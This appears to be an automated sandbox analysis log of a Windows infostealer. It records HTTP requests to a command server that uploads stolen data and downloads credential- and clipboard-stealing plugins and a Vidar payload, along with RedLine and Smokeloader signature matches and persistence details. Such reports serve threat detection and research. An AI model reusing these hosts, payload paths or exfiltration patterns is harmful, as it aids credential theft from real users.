Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 42 46 46 37 30 42 46 38 33 38 44 32 46 41 45 32 45 45 43 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 32 33 33 37 31 34 42 35 35 36 44 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8ABFF70BF838D2FAE2EECA3A5728455AF2739D7C43867BB42874233714B556D365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU0MTE=Host: topgamecheats.devContent-Length: 85563Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vidar.exe HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /j4Fvskd3/Plugins/clip64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU0MTE=Host: topgamecheats.devContent-Length: 85563Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 31 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000101001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /build.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU0MTE=Host: topgamecheats.devContent-Length: 85563Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU0MTE=Host: topgamecheats.devContent-Length: 85563Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU0MTE=Host: topgamecheats.devContent-Length: 85563Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU0MTE=Host: topgamecheats.devContent-Length: 85563Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU0MTE=Host: topgamecheats.devContent-Length: 85563Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 30 32 30 31 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000102011&unit=246122658369
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU0MTE=Host: topgamecheats.devContent-Length: 85563Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vidar.exe HTTP/1.1Host: topgamecheats.devRange: bytes=16384-If-Range: "661f4296-4b200"
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU3NDc=Host: topgamecheats.devContent-Length: 85899Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTEwNDA3Host: topgamecheats.devContent-Length: 110559Cache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 93.123.39.96 93.123.39.96
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NET1-ASBG NET1-ASBG
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00414770 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00414770
Source: global traffic HTTP traffic detected: GET /j4Fvskd3/Plugins/cred64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /vidar.exe HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /j4Fvskd3/Plugins/clip64.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /build.dll HTTP/1.1Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /vidar.exe HTTP/1.1Host: topgamecheats.devRange: bytes=16384-If-Range: "661f4296-4b200"
Source: unknown DNS traffic detected: queries for: topgamecheats.dev
Source: unknown HTTP traffic detected: POST /j4Fvskd3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODU0MTE=Host: topgamecheats.devContent-Length: 85563Cache-Control: no-cache
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/$
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2931017572.00000000069E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/build.dll
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/build.dll#
Source: Dctooux.exe, 0000001C.00000002.2931017572.00000000069E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/build.dllN
Source: Dctooux.exe, 0000001C.00000002.2931017572.00000000069E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/build.dllp
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dll
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/clip64.dllo
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2929110150.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll0-t
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dll=
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dllB
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dllR
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dllp
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002F5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/Plugins/cred64.dlly
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php:
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1.AppDataBG9
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002F8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1FDA
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002F8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1FEA
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1N
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1g
Source: Dctooux.exe, 0000001C.00000002.2931017572.00000000069E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.php?scr=1x
Source: Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.phpL-
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/j4Fvskd3/index.phpx-
Source: Dctooux.exe, 0000001C.00000002.2931017572.00000000069E0000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2929110150.0000000002FE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/vidar.exe
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/vidar.exe814606e0c54
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/vidar.exe814606e0c540
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/vidar.exe814606eodedx
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/vidar.exeM
Source: Amcache.hve.3.dr String found in binary or memory: http://upx.sf.net

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0000001C.00000002.2929040316.0000000002F04000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1842923328.0000000002F13000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000014.00000002.1847927204.0000000002E42000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000014.00000002.1848088766.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001C.00000002.2929453849.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1843161831.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0041FE97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 0_2_0041FE97
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0041FE97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 20_2_0041FE97
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0041FE97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 28_2_0041FE97
Creates files inside the system directory
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File created: C:\Windows\Tasks\Dctooux.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00409DA0 0_2_00409DA0
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_004270F1 0_2_004270F1
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0043B153 0_2_0043B153
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00424113 0_2_00424113
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0044A2D9 0_2_0044A2D9
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00446438 0_2_00446438
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00429492 0_2_00429492
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00424902 0_2_00424902
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0044AA2B 0_2_0044AA2B
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0044AB4B 0_2_0044AB4B
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0044BE90 0_2_0044BE90
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00404FE0 0_2_00404FE0
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00445FA0 0_2_00445FA0
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0492A540 0_2_0492A540
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_049096F9 0_2_049096F9
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0492C0F7 0_2_0492C0F7
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_048EA007 0_2_048EA007
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04926207 0_2_04926207
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_048E5247 0_2_048E5247
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0491B3BA 0_2_0491B3BA
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04907358 0_2_04907358
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0490437A 0_2_0490437A
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0492AC92 0_2_0492AC92
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0492ADB2 0_2_0492ADB2
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04904B69 0_2_04904B69
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00409DA0 20_2_00409DA0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_004270F1 20_2_004270F1
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0043B153 20_2_0043B153
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00424113 20_2_00424113
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0044A2D9 20_2_0044A2D9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00446438 20_2_00446438
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00429492 20_2_00429492
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00424902 20_2_00424902
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0044AA2B 20_2_0044AA2B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0044AB4B 20_2_0044AB4B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0044BE90 20_2_0044BE90
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00404FE0 20_2_00404FE0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00445FA0 20_2_00445FA0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0497A540 20_2_0497A540
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_049596F9 20_2_049596F9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0497C0F7 20_2_0497C0F7
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0493A007 20_2_0493A007
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04976207 20_2_04976207
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04935247 20_2_04935247
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0496B3BA 20_2_0496B3BA
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04957358 20_2_04957358
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0495437A 20_2_0495437A
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0497AC92 20_2_0497AC92
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0497ADB2 20_2_0497ADB2
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04954B69 20_2_04954B69
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0040F410 28_2_0040F410
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00424113 28_2_00424113
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00446438 28_2_00446438
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00424902 28_2_00424902
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0044AA2B 28_2_0044AA2B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0044AB4B 28_2_0044AB4B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00404FE0 28_2_00404FE0
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_004270F1 28_2_004270F1
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0043B153 28_2_0043B153
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00429492 28_2_00429492
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0044BE90 28_2_0044BE90
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03127358 28_2_03127358
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0312437A 28_2_0312437A
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0313B3BA 28_2_0313B3BA
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03146207 28_2_03146207
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03105247 28_2_03105247
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0310A007 28_2_0310A007
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0314C0F7 28_2_0314C0F7
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_031296F9 28_2_031296F9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0314A540 28_2_0314A540
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03124B69 28_2_03124B69
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0314ADB2 28_2_0314ADB2
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0314AC92 28_2_0314AC92
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: String function: 048FB627 appears 127 times
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: String function: 049014F7 appears 38 times
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: String function: 00421290 appears 41 times
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: String function: 0041B3C0 appears 123 times
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: String function: 04900EB9 appears 64 times
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: String function: 00420C52 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 04950EB9 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 00421290 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0041B3C0 appears 245 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 03120EB9 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 00420968 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 00420953 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0043C0A3 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0041ABA0 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0494B627 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 049514F7 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 00420C52 appears 146 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 03120BBA appears 48 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 0311B627 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: String function: 031214F7 appears 38 times
One or more processes crash
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 736
PE file does not import any functions
Source: build.dll.28.dr Static PE information: No import functions for PE file found
Source: build[1].dll.28.dr Static PE information: No import functions for PE file found
Source: cred64[1].dll.28.dr Static PE information: No import functions for PE file found
Source: clip64[1].dll.28.dr Static PE information: No import functions for PE file found
Source: cred64.dll.28.dr Static PE information: No import functions for PE file found
Source: vidar.exe.28.dr Static PE information: No import functions for PE file found
Source: vidar[1].exe.28.dr Static PE information: No import functions for PE file found
Source: clip64.dll.28.dr Static PE information: No import functions for PE file found
PE file overlay found
Source: build.dll.28.dr Static PE information: Data appended to the last section found
Source: build[1].dll.28.dr Static PE information: Data appended to the last section found
Source: cred64[1].dll.28.dr Static PE information: Data appended to the last section found
Source: clip64[1].dll.28.dr Static PE information: Data appended to the last section found
Source: cred64.dll.28.dr Static PE information: Data appended to the last section found
Source: vidar.exe.28.dr Static PE information: Data appended to the last section found
Source: vidar[1].exe.28.dr Static PE information: Data appended to the last section found
Source: clip64.dll.28.dr Static PE information: Data appended to the last section found
Uses 32bit PE files
Source: C4v61Eu50U.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0000001C.00000002.2929040316.0000000002F04000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1842923328.0000000002F13000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000014.00000002.1847927204.0000000002E42000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000014.00000002.1848088766.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001C.00000002.2929453849.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1843161831.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/81@2/1
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_02F13E6E CreateToolhelp32Snapshot,Module32First, 0_2_02F13E6E
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0040B375 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0040B375
